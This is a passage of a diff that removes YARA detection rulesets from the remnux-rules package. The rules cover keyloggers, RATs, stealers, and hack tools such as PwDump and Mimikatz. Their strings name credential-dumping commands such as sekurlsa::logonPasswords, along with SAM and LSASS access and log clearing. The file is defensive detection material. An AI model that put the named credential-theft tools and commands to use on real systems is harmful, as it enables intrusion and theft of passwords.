-		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
-		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
-		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
-		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
-		$s8 = "<definition>display help for this function</definition>" fullword ascii
-		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
-		$s10 = "Set the log limit (in number of windows)" fullword ascii
-		$s11 = "<example>qwgetlog</example>" fullword ascii
-		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
-		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
-		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
-		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
-		$s16 = "<command id=\"32\">" fullword ascii
-		$s17 = "<command id=\"3\">" fullword ascii
-		$s18 = "<command id=\"7\">" fullword ascii
-		$s19 = "<command id=\"1\">" fullword ascii
-		$s20 = "<command id=\"4\">" fullword ascii
-	condition:
-		10 of them
-}
-
-rule FiveEyes_QUERTY_Malwareqwerty_20120 {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20120.xml"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
-	strings:
-		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
-		$s1 = "<name>20120.dll</name>" fullword ascii
-		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<platform type=\"1\">" fullword ascii
-		$s5 = "</plugin>" fullword ascii
-		$s6 = "</pluginConfig>" fullword ascii
-		$s7 = "<pluginConfig>" fullword ascii
-		$s8 = "</platform>" fullword ascii
-		$s9 = "</lpConfig>" fullword ascii
-		$s10 = "<lpConfig>" fullword ascii
-	condition:
-		all of them
-}
-
-rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
-	meta:
-		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
-		author = "Florian Roth"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		date = "2015/01/18"
-		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
-	strings:
-		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
-		$s1 = "<message>Failed to get File Time</message>" fullword ascii
-		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
-		$s3 = "<message>Failed to set File Time</message>" fullword ascii
-		$s4 = "</commands>" fullword ascii
-		$s5 = "<commands>" fullword ascii
-		$s6 = "</version>" fullword ascii
-		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
-		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
-		$s9 = "</error>" fullword ascii
-		$s10 = "<message>Invalid File Size</message>" fullword ascii
-		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
-		$s12 = "<message>File Size Mismatch</message>" fullword ascii
-		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
-		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
-		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
-		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
-		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
-		$s18 = "<minorType>0</minorType>" fullword ascii
-		$s19 = "<code>00001002</code>" fullword ascii
-		$s20 = "<code>00001001</code>" fullword ascii
-	condition:
-		12 of them
-}
diff -Nru remnux-rules-0.0.3/yara/FlyingKitten.yara remnux-rules-0.0.4/yara/FlyingKitten.yara
--- remnux-rules-0.0.3/yara/FlyingKitten.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/FlyingKitten.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,40 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule FlyingKitten : rat
-{
-    meta:
-        Author      = "CrowdStrike, Inc"
-        Date        = "2014/05/13"
-        Description = "Flying Kitten RAT"
-        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
-
-    strings:
-        $classpath = "Stealer.Properties.Resources.resources"
-        $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"
-
-    condition:
-        all of them and uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x4550 and uint16(uint32(0x3C) + 0x16) & 0x2000 == 0 and ((uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0) or (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0)) 
-
-}
-
-rule CSIT_14003_03 : installer
-{ 
-    meta:
-        Author      = "CrowdStrike, Inc"
-        Date        = "2014/05/13"
-        Description = "Flying Kitten Installer"
-        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
-
-    strings:
-        $exename = "IntelRapidStart.exe"
-        $confname = "IntelRapidStart.exe.config"
-        $cabhdr = { 4d 53 43 46 00 00 00 00 } 
-
-    condition:
-        all of them
-}
diff -Nru remnux-rules-0.0.3/yara/Gh0st.yara remnux-rules-0.0.4/yara/Gh0st.yara
--- remnux-rules-0.0.3/yara/Gh0st.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Gh0st.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,70 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule APT_WIN_Gh0st_ver
-{
-meta:
-   author = "@BryanNolen"
-   date = "2012-12"
-   type = "APT"
-   version = "1.1"
-   ref = "Detection of Gh0st RAT server DLL component"
-   ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
- strings:  
-   $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
-   $capability = "GetClipboardData"
-   $capability1 = "capCreateCaptureWindowA"
-   $capability2 = "CreateRemoteThread"
-   $capability3 = "WriteProcessMemory"
-   $capability4 = "LsaRetrievePrivateData"
-   $capability5 = "AdjustTokenPrivileges"
-   $function = "ResetSSDT"
-   $window = "WinSta0\\Default"
-   $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64}    /* $magic = "Gh0st" */
- condition:
-   all of them
-}
-
-rule Gh0st
-{
-    meta:
-        description = "Gh0st"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $ = /(G)host/
-        $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
-        $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
-        $ = /(%)s\\shell\\open\\command/
-        $ = /(G)etClipboardData/
-        $ = /(W)riteProcessMemory/
-        $ = /(A)djustTokenPrivileges/
-        $ = /(W)inSta0\\Default/
-        $ = /(#)32770/
-        $ = /(#)32771/
-        $ = /(#)32772/
-        $ = /(#)32774/
-
-    condition:
-        all of them
-}
-
-rule gh0st
-
-{
-
-meta:
-	author = "https://github.com/jackcr/"
-
-   strings:
-      $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
-      $b = "Gh0st Update"
-
-   condition:
-      any of them
-
-}
diff -Nru remnux-rules-0.0.3/yara/Gholee.yara remnux-rules-0.0.4/yara/Gholee.yara
--- remnux-rules-0.0.3/yara/Gholee.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Gholee.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,107 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule gholeeV1
-{
-    meta:
-	 Author = "@GelosSnake"
-    	 Date = "2014/08"
-    	 Description = "Gholee first discovered variant "
-	 Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
-
-    strings:
-    	 $a = "sandbox_avg10_vc9_SP1_2011"
-    	 $b = "gholee"
-
-    condition:
-    	 all of them
-}
-
-rule gholeeV2
-{
-   meta:
-	Author = "@GelosSnake"
-	Date = "2015-02-12"
-    	Description = "Gholee first discovered variant "
-	Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
-
-   strings:
-	$string0 = "RichHa"
-	$string1 = "         (((((                  H" wide
-	$string2 = "1$1,141<1D1L1T1\\1d1l1t1"
-	$string3 = "<8;$O' "
-	$string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
-	$string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
-	$string6 = "urn:schemas-microsoft-com:asm.v1"
-	$string7 = "8.848H8O8i8s8y8"
-	$string8 = "wrapper3" wide
-	$string9 = "pwwwwwwww"
-	$string10 = "Sunday"
-	$string11 = "YYuTVWh"
-	$string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
-	$string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
-	$string15 = "wrapper3 Version 1.0" wide
-	$string16 = "77A779"
-	$string17 = "<C<G<M<R<X<"
-	$string18 = "9 9-9N9X9s9"
-
-    condition:
-	18 of them
-}
-
-rule MW_gholee_v1 : v1
-{
-meta:
-    Author = "@GelosSnake"
-    description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
-    date = "2014-08"
-    maltype = "Remote Access Trojan"
-    sample_filetype = "dll"
-    hash0 = "48573a150562c57742230583456b4c02"
-   
-strings:
-    $a = "sandbox_avg10_vc9_SP1_2011"
-    $b = "gholee"
-   
-condition:
-    all of them
-}
- 
-rule MW_gholee_v2 : v2
-{
-meta:
-        author = "@GelosSnake"
-        date = "2015-02-12"
-        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
-        hash0 = "05523761ca296ec09afdf79477e5f18d"
-        hash1 = "08e424ac42e6efa361eccefdf3c13b21"
-        hash2 = "5730f925145f1a1cd8380197e01d9e06"
-        hash3 = "73461c8578dd9ab86d42984f30c04610"
-        sample_filetype = "dll"
-strings:
-        $string0 = "RichHa"
-        $string1 = "         (((((                  H" wide
-        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
-        $string3 = "<8;$O' "
-        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
-        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
-        $string6 = "urn:schemas-microsoft-com:asm.v1"
-        $string7 = "8.848H8O8i8s8y8"
-        $string8 = "wrapper3" wide
-        $string9 = "pwwwwwwww"
-        $string10 = "Sunday"
-        $string11 = "YYuTVWh"
-        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
-        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
-        $string15 = "wrapper3 Version 1.0" wide
-        $string16 = "77A779"
-        $string17 = "<C<G<M<R<X<"
-        $string18 = "9 9-9N9X9s9"
-condition:
-        18 of them
-}
-
diff -Nru remnux-rules-0.0.3/yara/Glasses.yara remnux-rules-0.0.4/yara/Glasses.yara
--- remnux-rules-0.0.3/yara/Glasses.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Glasses.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,50 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule GlassesCode : Glasses Family 
-{
-    meta:
-        description = "Glasses code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-22"
-        
-    strings:
-        $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
-        $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
-        
-    condition:
-        any of them
-}
-
-rule GlassesStrings : Glasses Family
-{
-    meta:
-        description = "Strings used by Glasses"
-        author = "Seth Hardy"
-        last_modified = "2014-07-22"
-        
-    strings:
-        $ = "thequickbrownfxjmpsvalzydg"
-        $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
-        $ = "\" target=\"NewRef\"></a>"
- 
-    condition:
-        all of them
-
-}
-
-rule Glasses : Family
-{
-    meta:
-        description = "Glasses family"
-        author = "Seth Hardy"
-        last_modified = "2014-07-22"
-   
-    condition:
-        GlassesCode or GlassesStrings
-        
-}
diff -Nru remnux-rules-0.0.3/yara/Grozlex.yara remnux-rules-0.0.4/yara/Grozlex.yara
--- remnux-rules-0.0.3/yara/Grozlex.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Grozlex.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,20 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Grozlex : Stealer
-{
-	meta:
-		author="Kevin Falcoz"
-		date="20/08/2013"
-		description="Grozlex Stealer - Possible HCStealer"
-		
-	strings:
-		$signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E}
-	
-	condition:
-		$signature
-}
diff -Nru remnux-rules-0.0.3/yara/HackTools.yara remnux-rules-0.0.4/yara/HackTools.yara
--- remnux-rules-0.0.3/yara/HackTools.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/HackTools.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,3241 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule PwDump
-{
-	meta:
-		description = "PwDump 6 variant"
-		author = "Marc Stroebel"
-		date = "2014-04-24"
-		score = 70
-	strings:
-		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
-		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
-		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
-	condition:
-		all of them
-}
-
-rule PScan_Portscan_1 {
-	meta:
-		description = "PScan - Port Scanner"
-		author = "F. Roth"
-		score = 50
-	strings:
-		$a = "00050;0F0M0X0a0v0}0"
-		$b = "vwgvwgvP76"
-		$c = "Pr0PhOFyP"
-		condition:
-		all of them
-}
-
-rule HackTool_Samples {
-	meta: 
-		description = "Hacktool"
-		score = 50
-	strings:
-		$a = "Unable to uninstall the fgexec service"
-		$b = "Unable to set socket to sniff"
-		$c = "Failed to load SAM functions"
-		$d = "Dump system passwords"
-		$e = "Error opening sam hive or not valid file"
-		$f = "Couldn't find LSASS pid"
-		$g = "samdump.dll"
-		$h = "WPEPRO SEND PACKET"
-		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
-		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
-		$k = "arpspoof\\Debug"
-		$l = "Success: The log has been cleared"
-		$m = "clearlogs [\\\\computername"
-		$n = "DumpUsers 1."
-		$o = "dictionary attack with specified dictionary file"
-		$p = "by Objectif Securite"
-		$q = "objectif-securite"
-		$r = "Cannot query LSA Secret on remote host"
-		$s = "Cannot write to process memory on remote host"
-		$t = "Cannot start PWDumpX service on host"
-		$u = "usage: %s <system hive> <security hive>"
-		$v = "username:domainname:LMhash:NThash"
-		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
-		$x = "Impersonation Tokens Available"
-		$y = "failed to parse pwdump format string"
-		$z = "Dumping password"
-	condition: 
-		1 of them
-}
-
-rule HackTool_Producers {
-	meta: description = "Hacktool Producers String" threat_level = 5 score = 50
-	strings:
-	$a1 = "www.oxid.it"
-	$a2 = "www.analogx.com"
-	$a3 = "ntsecurity.nu"
-	$a4 = "gentilkiwi.com"
-	$a6 = "Marcus Murray"
-	$extension = /extension: \.(ini|xml)\n/
-	condition: 1 of ($a*) and not $extension
-}
-
-/* Mimikatz */
-
-rule Mimikatz_Memory_Rule_1 : APT {
-	meta: 
-		author = "Florian Roth"
-		date = "12/22/2014"
-		score = 70
-		type = "memory"
-		description = "Detects password dumper mimikatz in memory"
-	strings:
-		$s1 = "sekurlsa::msv" fullword ascii
-	    $s2 = "sekurlsa::wdigest" fullword ascii
-	    $s4 = "sekurlsa::kerberos" fullword ascii
-	    $s5 = "sekurlsa::tspkg" fullword ascii
-	    $s6 = "sekurlsa::livessp" fullword ascii
-	    $s7 = "sekurlsa::ssp" fullword ascii
-	    $s8 = "sekurlsa::logonPasswords" fullword ascii
-	    $s9 = "sekurlsa::process" fullword ascii
-	    $s10 = "ekurlsa::minidump" fullword ascii
-	    $s11 = "sekurlsa::pth" fullword ascii
-	    $s12 = "sekurlsa::tickets" fullword ascii
-	    $s13 = "sekurlsa::ekeys" fullword ascii
-	    $s14 = "sekurlsa::dpapi" fullword ascii
-	    $s15 = "sekurlsa::credman" fullword ascii
-	condition:
-		1 of them
-}
-
-rule Mimikatz_Memory_Rule_2 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a memory dump"
-		author = "Florian Roth - Florian Roth"
-		type = "memory"
-		score = 80
-	strings:
-		$s0 = "sekurlsa::" ascii
-		$x1 = "cryptprimitives.pdb" ascii
-		$x2 = "Now is t1O" ascii fullword
-		$x4 = "ALICE123" ascii
-		$x5 = "BOBBY456" ascii
-	condition:
-		$s0 and 1 of ($x*)
-}
-
-rule Mimikatz_SampleSet_1 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		hash1 = "9ef9762169e8b44d01613234927f44d6"
-		hash2 = "35b34bb9f1ad0fdf48dc090ed4a8190f"	
-		hash3 = "516fde1fe06f96a019c3ad063c78b760"
-		hash4 = "faf248ee5184b65d28786d91c02864a6"
-		hash5 = "5847659129c4e711809ab5b6ab1b8bd8"
-		score = 80
-	strings:
-		$s0 = "mimikatz_trunk/Win32/mimidrv.sys" fullword
-		$s1 = "Mimikatz 2.0\\x64\\mimidrv.sys" fullword
-		$s2 = "32\\kelloworld.dll"
-		$s3 = "64\\kelloworld.dll"
-		$s4 = "32/kelloworld.dll"
-		$s5 = "64/kelloworld.dll"
-		$s6 = "mimidrv.sys" fullword
-		$s7 = "sekurlsa.lib" fullword
-		$s8 = "mimilib.dll" fullword
-		$s9 = "mimikatz.exe" fullword
-	condition:
-		3 of them
-}
-rule Mimikatz_SampleSet_2 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		hash = "6f14b6744aad66ac017ab7733cdb51ad"
-		score = 50
-	strings:
-		$s0 = "notsupported" fullword
-		$s1 = "getKerberos" fullword
-		$s2 = "M(knN0123456789abcdefghijklmnopqrstuvwxyz" fullword
-		$s3 = "getLiveSSPFunctions" fullword
-		$s4 = "getKerberosFunctions" fullword
-		$s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
-		$s6 = ".?AV_System_error@std@@" fullword
-		$s7 = "getCredmanFunctions" fullword
-		$s8 = "find_tokens" fullword
-	condition:
-		all of them
-}
-
-rule Mimikatz_SampleSet_3 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		hash = "f62848e3cd2f0316608c2696c6504b4a"
-		score = 50
-	strings:
-		$s8 = "x64/intra.kirbi" fullword
-		$s9 = "x64/intra.kirbi*kb" fullword
-	condition:
-		all of them
-}
-
-rule Mimikatz_SampleSet_4 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		hash1 = "8991aeef8b33049c5997c59afcea4a27"
-		hash2 = "a3e00b039f2d2ea04a4274506dd83be0"
-		hash3 = "cb5d40cc8db79c3d24f20f443f7e5926"
-		score = 40
-	strings:
-		$s0 = "notsupported" fullword
-		$s1 = "getLiveSSP" fullword
-		$s2 = "getKerberos" fullword
-		$s3 = "getLiveSSPFunctions" fullword
-		$s4 = "getKerberosFunctions" fullword
-		$s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
-		$s6 = "getCredmanFunctions" fullword
-		$s7 = "getCredman" fullword
-		$s8 = "find_tokens" fullword
-	condition:
-		all of them
-}
-
-rule Mimikatz_SampleSet_5 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		hash1 = "9ca015f05cc4cbae8d50bcd067e6d605"
-		score = 50
-	strings:
-		$s6 = "mimidrv.sys" fullword
-	condition:
-		all of them
-}
-rule Mimikatz_SampleSet_6 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		hash = "739c80bac405eb1b0ebbe10a75515ff1"
-	strings:
-		$s1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
-		$s2 = "Erreur : impossible d'ouvrir le bureau cible (" fullword
-	condition:
-		all of them
-}
-
-rule Mimikatz_SampleSet_7 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		super_rule = 1
-		hash0 = "821e5dc1ad4bbad2958e036c84bf7734"
-		hash1 = "e39e57fb7ff38e7be1a8da785ef83557"
-		hash2 = "9ecb8020b0989778009d5aaf13640ea4"
-		hash3 = "4bfe2b27a63678fa6b4bd27c8d309508"
-		hash4 = "fb164aadc2ae4a7aa3fc3f54cd8fa92a"
-		hash5 = "33786d2823e6d5e75b1a3a8bb2837b40"
-		hash6 = "a4c1feb5f3f5a71320aeca588cb1f14c"
-		hash7 = "36fc962a871cfb9f7d31dc9faaab5b54"
-		hash8 = "35bc4af0cbaa48e8a72884e3e690fc3b"
-		hash9 = "f1de7a81394efe6cc9438033a75cae0d"
-		hash10 = "a6e0cf20f2de5149885297188644f123"
-		hash11 = "bb7d4174e9ffae01a14993c528de8653"
-		hash12 = "ffd3df1ee7bfd6f1255221c3f82478f1"
-		hash13 = "eaf8dfbe80c42dd92740a9e71ea444ab"
-		hash14 = "e25b75621c03da7addc55dac378d77c4"
-		hash15 = "41ea9b05bcfceca78d51f776bfdee393"
-		hash16 = "a03a4272be8a2ee5e48ba2c417ff3b5b"
-		hash17 = "96501f7e9dc19a4012b1f5db1dce7018"
-		hash18 = "b6fe1b2e961c294155d8f48b6c57f28f"
-		hash19 = "1680c6afebcb77a21b6619aedc304931"
-		hash20 = "46820c90b2fb296e26b4bb8f7cad51ac"
-		hash21 = "a21634571795601f5eace5d503246b3b"
-		hash22 = "e6dda29f842ce3b7c72b5536fab4f860"
-		hash23 = "006480db3303a7ba9d73e32bc6c0bc11"
-		hash24 = "efa68dd73410c4be6f6b0a95a02762f2"
-		hash25 = "7194944aa418851631d7e614ff430b0a"
-		hash26 = "3a98b9190bf6ed5f75d9c3950a63dd08"
-		hash27 = "02f7536279480b73c9942c072c1b5316"
-		hash28 = "8638370c805dc92581eba34fa57eb45e"
-		hash29 = "6f393ab258b87790a45d6d2b125bbc24"
-		hash30 = "dbb01a015ab11266bae5d6381ffd41c2"
-		score = 80
-	strings:
-		$s0 = "#         * Kernel mode *         #" fullword
-		$s1 = "kerberos!KerbGlobalLogonSessionTable" fullword
-		$s2 = "Authentication Id : %u ; %u (%08x:%08x)" fullword
-		$s3 = "%p - lsasrv!InitializationVector" fullword
-		$s4 = "%p - lsasrv!LogonSessionListCount" fullword
-		$s7 = "#          * User mode *          #" fullword
-		$s8 = "##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )"
-		$s9 = "livessp!LiveGlobalLogonSessionList" fullword
-	condition:
-		all of them
-}
-rule Mimikatz_SampleSet_8 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		super_rule = 1
-		hash0 = "0a10fe0a341ac0b24347f183c83123cc"
-		hash1 = "d7e16bc11cdfc0f781e87f5df4ae24a5"
-		hash2 = "abdb41e32c447e703b03c9e307565ed3"
-		score = 40
-	strings:
-		$s0 = "?!?(?0?8?@?H?P?X?`?n?w?" fullword
-		$s1 = "2\"2'2.24292@2F2K2R2X2]2d2j2o2v2|2" fullword
-		$s2 = "7!7<7C7P7V7^7d7r7" fullword
-		$s3 = "0#0)0=0E0K0[0c0i0" fullword
-		$s4 = "878E8L8Y8`8f8l8r8" fullword
-		$s5 = ":*:/:7:=:B:I:O:T:[:a:f:m:s:x:" fullword
-		$s6 = "<'<4<9<D<K<Q<X<e<j<u<{<" fullword
-		$s7 = "8&878?8M8R8]8d8q8~8" fullword
-		$s8 = ";,;2;A;F;L;_;d;k;q;" fullword
-		$s9 = "3%3+31373=3C3I3N3_3s3" fullword
-	condition:
-		all of them
-}
-rule Mimikatz_SampleSet_9 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		super_rule = 1
-		hash0 = "6e2eda476c141c63ff62c92d8b52ff7e"
-		hash1 = "f42b75103230cab39e4c58d5b0dca2c4"
-		hash2 = "dc6f62e3a0b584cb134633a12fd7d7b8"
-		hash3 = "d5918d735a23f746f0e83f724c4f26e5"
-		hash4 = "e98b714ccd14e61f776cc55a602d2dd0"
-		hash5 = "09a6e5cc589a485d9ab4eda772b46f2a"
-		hash6 = "4a51faef37af8b70fc9cf7c64f030b25"
-		hash7 = "e52e30811287426d4eef089a65cc2acf"
-		hash8 = "cd1606a1800150a33dea71d3f3ee9aed"
-		hash9 = "510fe825464dca92aadcd3d8289405aa"
-		hash10 = "0be87e16eb598006358cdaa9dfcd5af5"
-		hash11 = "1f0ce022ee9fe8d92235809eda73ce38"
-		hash12 = "e172a38ade3aa0a2bc1bf9604a54a3b5"
-		hash13 = "de20bddb9c3b1b09d980db5bbb5b5789"
-		hash14 = "c77db1ddffc7e6edac60bb5ca9a6e863"
-		hash15 = "6d8008edd86c5ca1a112018852777b1e"
-		hash16 = "525d6ca1446b01f912303f04f0c713ab"
-		score = 70
-	strings:
-		$s6 = "\\i386\\mimidrv.pdb"
-	condition:
-		all of them
-}
-rule Mimikatz_SampleSet_10 : APT {
-	meta:
-		description = "Mimikatz Rule generated from a big Mimikatz sample set"
-		author = "Florian Roth - Florian Roth"
-		super_rule = 1
-		hash0 = "5522fd8fe2e205b30f9e74a94da0352d"
-		hash1 = "ec428ed7d1cc4ba3023696ddc138a376"
-		hash2 = "13e88493f844a0df3352cd721bfa41a6"
-		hash3 = "483e5365e1f1d83c2dcd4bdb398e779f"
-		hash4 = "04d04a1f0ff9e2ff1d35b8c2950cce53"
-		hash5 = "97cbbd6c4153ae4a410439e2c02d77ce"
-		hash6 = "b43dfc8be8db7eacfc993e323229fb9f"
-		hash7 = "72e95180a2e4ab59e1b7c10f1054740a"
-		hash8 = "eaaecd5bd100923c72d2b39d84dfd411"
-		hash9 = "a8ae792f0384fd3e7f411c826b48b7c8"
-		score = 40
-	strings:
-		$s0 = "D$hL9(t" fullword
-		$s1 = "l$LfD9o" fullword
-		$s2 = "AHH90t?L" fullword
-		$s3 = "M9Qpv\"I9Ips" fullword
-		$s4 = "tSD8T$<u" fullword
-		$s5 = ";f9T$Xw" fullword
-		$s6 = "6f9L$Xw" fullword
-		$s7 = "f;\\$@u1E3" fullword
-		$s8 = "8\\$8uFH" fullword
-		$s9 = "L$DfD;O" fullword
-	condition:
-		all of them
-}
-
-/* Removed Mimikatz samples set super rules 11 - 27 */
-
-/* Disclosed hack tool set */
-
-rule Fierce2
-{
-	meta:
-		author = "Florian Roth"
-		description = "This signature detects the Fierce2 domain scanner"
-		date = "07/2014"
-		score = 60
-	strings:
-		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
-	condition:
-		1 of them
-}
-
-rule Ncrack
-{
-	meta:
-		author = "Florian Roth"
-		description = "This signature detects the Ncrack brute force tool"
-		date = "07/2014"
-		score = 60
-	strings:
-		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
-	condition:
-		1 of them
-}
-
-rule SQLMap
-{
-	meta:
-		author = "Florian Roth"
-		description = "This signature detects the SQLMap SQL injection tool"
-		date = "07/2014"
-		score = 60
-	strings:
-		$s1 = "except SqlmapBaseException, ex:"
-	condition:
-		1 of them
-}
-
-rule PortScanner {
-	meta:
-		description = "Auto-generated rule on file PortScanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "b381b9212282c0c650cb4b0323436c63"
-	strings:
-		$s0 = "Scan Ports Every"
